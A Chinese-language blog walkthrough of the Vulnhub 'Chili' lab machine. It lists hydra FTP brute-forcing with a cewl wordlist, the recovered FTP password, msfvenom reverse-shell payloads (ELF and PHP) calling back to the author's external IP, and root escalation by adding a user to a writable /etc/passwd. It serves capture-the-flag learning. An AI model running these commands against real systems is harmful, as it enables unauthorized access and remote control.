【Vulnhub】Chili

文章描述了一位安全研究员通过开启FTP服务和80端口进行安全测试的过程。他们使用cewl和rockyou.txt字典对FTP进行爆破,尝试获取权限。之后,由于FTP权限限制,他们生成PHP木马上传至服务器并尝试连接,最终成功提权并读取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息收集

在这里插入图片描述
在这里插入图片描述
开了ftp服务和80端口,网站也只有一张图片,扫目录也没有别的

爆破

在这里插入图片描述
一个关键词?用cewl爬一下关键字,再配合rockyou.txt爆破一下ftp。
提示很少,只能用这种暴力方法来尝试rockyou.txt很大,要等些时间

cewl http://192.168.83.145/ > user.txt
hydra -L user.txt -P rockyou.txt 192.168.83.145 ftp

chili:a1b2c3d4

在这里插入图片描述
用xftp连接了一下没什么东西

提权

在这里插入图片描述
用户目录下没什么东西,去看看网站根目录,我们有一个权限比较高的nano目录,msf生成木马上传

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=120.27.114.xx LPORT=7000 -f elf > mshell.elf
我的是云服务器,真实ip所以xx保密

在这里插入图片描述
执行不了。。。。,可能ftp权限不能执行文件吧,那就生成php木马吧,上传上去然后访问页面

msfvenom -p php/meterpreter_reverse_tcp LHOST=120.27.114.84 LPORT=7000 -f raw  > shell.php

在这里插入图片描述
连上了又立马断了,payload忘换了,
在这里插入图片描述
在这里插入图片描述
这下好了,上传检测工具到网站目录下
在这里插入图片描述
shell模式下才能执行脚本
在这里插入图片描述
可以对/etc/psswd操作,添加一个高权限用户

/usr/bin/perl -le 'print crypt("test","test")'
首先在本机通过perl语言生成test用户的密码密文

在这里插入图片描述
ok提权到root,读取flag
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值